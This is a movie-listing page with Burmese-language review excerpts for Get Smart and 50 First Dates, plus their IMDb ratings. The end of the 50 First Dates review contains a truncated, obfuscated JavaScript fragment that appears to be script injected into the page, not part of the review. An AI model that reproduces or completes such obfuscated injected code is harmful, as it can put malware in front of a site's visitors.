Alpha Premium

Jonathan Loughran

Get Smart 6.5
Get Smart Get Smart(2008) IMDb…….6.5 ဒီကားကိုမကြည့်ခင် ခင်ဗျားတို့ သတိလေးပေးချင်တယ်… ဥပမာ အိမ်မှာ မိသားစုဝင် ၅ယောက်လုံးရှိတယ်ထား..ခင်ဗျားက ဒီကားကိုကြည့်ဖို့ပြင်ဆင်ပြီဆိုရင် ကျန်တဲ့ ၄ယောက်ပါ TVရှေ့ကိုခေါ်ကြည့်သင့်တယ်….လင်မယား ၂ ယောက်ထဲဆိုလည်း ၂ယောက်လုံးကြည့်ဖြစ် အောင်ကြည့် တစ်ယောက်ထဲကြည့်မိရင် အံကြိတ်ပြီး တခိခိရယ်တဲ့ကိုယ့်ကို ကျန်တဲ့သူတွေက ရူးများသွားတာလား ခေါင်းချောင်သွားတာလားဆိုတဲ့အတွေးနဲ့ကြည့်တာခံရလိမ့်မယ် ကျွန်တော့ချစ်သူလေးကတော့ “ကို”တော့ရူးသွားပြီ တံတားလေးပို့ရတော့မယ်လို့ပြောသွားတယ်…… ဒီကားရဲ့မင်းသား Steve Carell ကိုတော့အားလုံးရင်းနှီးပြီးသားဖြစ်မှာပါ…မင်းသမီးချောလေး Hathaway ရယ် Dwayne Jonson(The rock)ရယ်ပါဝင်ထားလေတယ်…မျက်နှာတွေပြူးပြဲပြ ရွံ့စရာအကွက်တွေနဲ့ပြ အိုဗာတင်းဟာသကွက်တွေ လို့မထင်လိုက်နဲ့ … Steve carell က အထူးအေးဂျင့်တွေအတွက်သတင်းစုဆောင်းတဲ့သူတစ်ယောက် ပြောရရင် ရုံးစာရေးဆိုပါတော့ ဒါပေမဲ့ သူ့ရဲ့ အိပ်မက်က အေးဂျင့်ဖြစ်ချင်တာပဲ….တစ်နေ့တော့ နျူကလီးယားလက်နက်အတွက် အရေးကြီးယူရေနီယမ်တွေအခိုးခံရတော့ အကြမ်းဖက်အဖွဲ့တွေမရိပ်မိအောင် တစ်ခါမှ လူဆိုးတွေနဲ့မဆက်ဆံဖူးတဲ့Steve Carell နဲ့ မျက်နှာခွဲစိတ်ပြုပြင်ထားတဲ့ မင်းသမီးချော Hathaway ရယ်ကိုလွှတ်လိုက်တယ်….. ခင်ဗျားတို့ကတော့ ထင်လိမ့်မယ် ရုံးစာရေးကိုလွှတ်တယ်ဆိုတော့ ဘာစကေးမှမရှိဘူး အလွဲတွေနဲ့ကြည့်ရဆိုးမယ်လို့ပေါ့ အာ့ဆိုလုံးဝလွဲသွားလိမ့်မယ် သူက အေးဂျင့်ဖြစ်ချင်တာဆိုတော့ အကုန်လေ့ကျင့်ထားတယ် တိုက်ရည်ခိုက်ရည်တွေနဲ့ အားလုံးကို မှတ်မိတတ်တဲ့ သူ့ဦးနှောက်ကို ပေါင်းစပ်လိုက်တော့ အတော်လေးအလုပ်ဖြစ်တယ်…. ရယ်စရာတွေကလည်း ...
6.5
IMDB: 6.5/10 198,120 votes
movie

Get Smart

2008
Premium
50 First Dates 6.8
50 First Dates 50 First Dates(2004) သစ္စာနီကပြောတယ် အချစ်ဆိုတာ ဆပ်ပြာဖူဖောင်းတဲ့ တာရာမင်းဝေကတော့ အချစ်ဆိုတာ မသိစိတ်ရဲ့တည်ရှိခြင်းနဲ့ ဖြစ်ခြင်းကြားက လျှို့ဝှက်သောဆုံမှတ်တဲ့ တက္ကသိုလ်ဘုန်းနိုင်ကတော့ အချစ်စစ်ဆိုတာ တစ်သက်မှာတစ်ခါပွင့်တဲ့ ပိတောက်ပန်းရဲ့သစ္စာတရားနဲ့ခိုင်းနှိုင်းထားတယ် အချစ်ကြောင့်ဖြစ်တဲ့လုပ်ရပ်တွေကိုတော့တစ်ချို့ကပြောကြတယ် ဟန်ဆောင်မှုတွေကျော်လွန်ပြီး သတ္တိတွေရဲ့အလွန်ကိုတွန်းပို့ခြင်းခံရတဲ့လုပ်ရပ်တဲ့ ရူးသွပ်မိုက်မဲခြင်းလို့လည်း ခပ်ကြမ်းကြမ်းခေါင်းစဉ်တပ်ကြတာလည်းရှိတယ်….ကျွန်တော်တို့ဘဝမှာ မိုက်မဲခြင်း ရူးသွပ်ခြင်းတွေမြောက်များစွာ လုပ်ခဲ့ကြတယ် ဒီလိုလုပ်ရပ်တွေကြားမှာ အချစ်ကြောင့်ရူးသွပ်သွားတာကတော့ အရမ်းချိုမြိန်ပျော်ရွှင်ဖို့ကောင်းပါတယ် …..ဘာလို့ဆို နှလုံးသားရဲ့လိုအပ် ချက် အချစ်ကိုတခြားအရာတွေက ဖြည့်ဆည်းပေးနိုင်တာမှမဟုတ်တာ……… ငါးပြတိုက်မှာအလုပ်လုပ်နေတဲ့လူရွယ်တစ်ယောက်ရှိတယ်…တစ်နေ့စားသောက်ဆိုင်မှာထိုင်နေရင်း မုန်တွေ့နဲ့ဆော့ကစားနေတဲ့ကောင်မလေးကိုတွေ့ မိတယ်….အဲ့ကောင်မလေးကိုမြင်တော့စိတ်ဝင်စားသွားပြီး ချဉ်းကပ်မိတယ်…..သူအောင်မြင်ပါတယ်…နောက်နေ့ဒီလိုအချိန်တွေ့ဖို့ကောင်မလေး ကတောင်ပြန်ချိန်းသွားတယ်….နောက်တစ်နေ့မှာ ကောင်မလေးနဲ့တွေ့တော့ သူနှုတ်ဆက်မိတယ်…ထူးဆန်းတာက ကောင်မလေးရဲ့တုန့်ပြန်မှုပဲ… ခပ်စိမ်းစိမ်းကြည့်ရင်း ဘာတွေလာကြောင်နေတာလဲဆိုတဲ့ခွန်းတုံပြန်မှုကြောင့် သူဆွံအသွားတယ်…. နောက်မှသိလိုက်ရတာက ကောင်မလေးဟာ ကားမတော်တဆမှုကြောင့် ခပ်ဆန်းဆန်းအတိတ်မေ့ရောဂါရနေတာပါပဲ….. ကျွန်တော်ပြောတဲ့ သတ္တိတွေရဲ့အလွန် ရူးသွပ်မိုက်မဲခြင်းဆိုတာ အဲ့ဒီမှ စတာပဲ…ဆက်ပြောရင် ပေါ့သွားမှာစိုးရိမ်လို့ ဒီတင်ပဲနားပါရစေ…. ” ခင်ဗျား တို့ ကျွန်တော့ကိုရူးတယ်ပဲပြောပြော မိုက်မဲလွန်းတယ်ပြောပြောရပါတယ် ဒါပေမဲ့ ကျွန်တော်ပျော်တယ် ကျွန်တော့ဘဝဟာ သူမပါ…. အားလုံးအတွက်ရင်ဆိုင်နိုင်တယ်.. .နောက်တစ်ခုပြောချင်တာက ကျွန်တော့ကိုပြစ်တင်ဝေဖန်နေမိတယ်ဆိုရင် သေချာတယ် ခင်ဗျားဟာ အချစ်ကိုမကြုံဖူးသေးသလို ကျွန်တော့လိုအချစ်စစ်တစ်ခုနဲ့မချစ်ဖူးသေးလို့ပါပဲ….” ဒီကားလေးပြီးတော့ လူရွယ်က ကျွန်တော်တို့ကို အသံတိတ် ဒီစကားလေးပြောသွားတယ်လို့ ကျွန်တော်ထင်မိတယ် function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let ...
6.8
IMDB: 6.8/10 316,552 votes
movie

50 First Dates

2004
Premium

Release year

Genres

Release year